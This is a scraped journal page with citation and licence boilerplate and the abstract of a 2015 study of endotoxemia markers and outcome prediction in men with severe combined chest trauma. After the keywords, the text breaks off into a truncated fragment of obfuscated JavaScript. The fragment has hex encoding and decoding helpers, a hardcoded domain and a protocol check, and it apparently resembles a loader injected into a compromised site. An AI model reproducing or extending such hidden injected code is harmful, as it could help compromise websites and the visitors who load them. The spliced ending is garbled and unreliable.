ENDOGENEOUS INTOXICATION IN PATIENTS WITH COMBINED THORACIC TRAUMA DURING EARLY POSTTRAUMATIC PERIOD - Myroslav Andew Stupnytskyi (Kazimierz Wielki University, 2015)
Stupnytskyi M. A. Endogeneous intoxication in patients with combined thoracic trauma during early posttraumatic period. Journal of Education, Health and Sport. 2015;5(12):23-30. ISSN 2391-8306. DOIhttp://dx.doi.org/10.5281/zenodo.34596 http://ojs.ukw.edu.pl/index.php/johs/article/view/2015%3B5%2812%29%3A23-30   Formerly Journal of Health Sciences. ISSN 1429-9623 / 2300-665X. Archives 2011-2014http://journal.rsw.edu.pl/index.php/JHS/issue/archive   Deklaracja. Specyfika i zawartość merytoryczna czasopisma nie ulega zmianie. Zgodnie z informacją MNiSW z dnia 2 czerwca 2014 r., że w roku 2014 nie będzie przeprowadzana ocena czasopism naukowych; czasopismo o zmienionym tytule otrzymuje tyle samo punktów co na wykazie czasopism naukowych z dnia 31 grudnia 2014 r. The journal has had 5 points in Ministry of Science and Higher Education of Poland parametric evaluation. Part B item 1089. (31.12.2014). © The Author (s) 2015; This article is published with open access at Licensee Open Journal Systems of Kazimierz Wielki University in Bydgoszcz, Poland and Radom University in Radom, Poland Open Access. This article is distributed under the terms of the Creative Commons Attribution Noncommercial License which permits any noncommercial use, distribution, and reproduction in any medium, provided the original author(s) and source are credited. This is an open access article licensed under the terms of the Creative Commons Attribution Non Commercial License (http://creativecommons.org/licenses/by-nc/3.0/) which permits unrestricted, non commercial use, distribution and reproduction in any medium, provided the work is properly cited. This is an open access article licensed under the terms of the Creative Commons Attribution Non Commercial License (http://creativecommons.org/licenses/by-nc/3.0/) which permits unrestricted, non commercial use, distribution and reproduction in any medium, provided the work is properly cited. The authors declare that there is no conflict of interests regarding the publication of this paper. Received: 25.09.2015. Revised 25.10.2015. Accepted: 30.11.2015.   ENDOGENEOUS INTOXICATION IN PATIENTS WITH COMBINED THORACIC TRAUMA DURING EARLY POSTTRAUMATIC PERIOD   M. A. Stupnytskyi   Biochemistry Department, Kharkiv National Medical University, Kharkiv, Ukraine   Myroslav Stupnytskyi stupnytskyima@gmail.com   Abstract. The aim of the study was to investigate the dynamic of the endotoxemia markers' plasmatic concentrations and the possibility of using them for outcome prediction in patients with the severe combined chest trauma during early posttraumatic period. Study was performed on 73 male patients aged from 20 to 68. The concentrations of oxidative stress markers do not represent the activity of oxidative processes in case of massive infusion therapy especially on 1-2-d day after trauma. The level of the medium-sized peptides fractions concentrations can reflect severity of endotoxemia better than routine clinical markers (urea and creatinine) and can serve as additional markers for outcome prediction in patients with the severe combined thoracic trauma. The severity of injury and the level of traumatic shock leads to proportional accumulation of the peptide fraction of the medium-sized peptides up to 5-6-th day after trauma.   Key words: chest trauma, polytrauma, endogenous intoxication, oxidative stress, wound dystrophy. // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "ojs.ukw.edu.pl"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e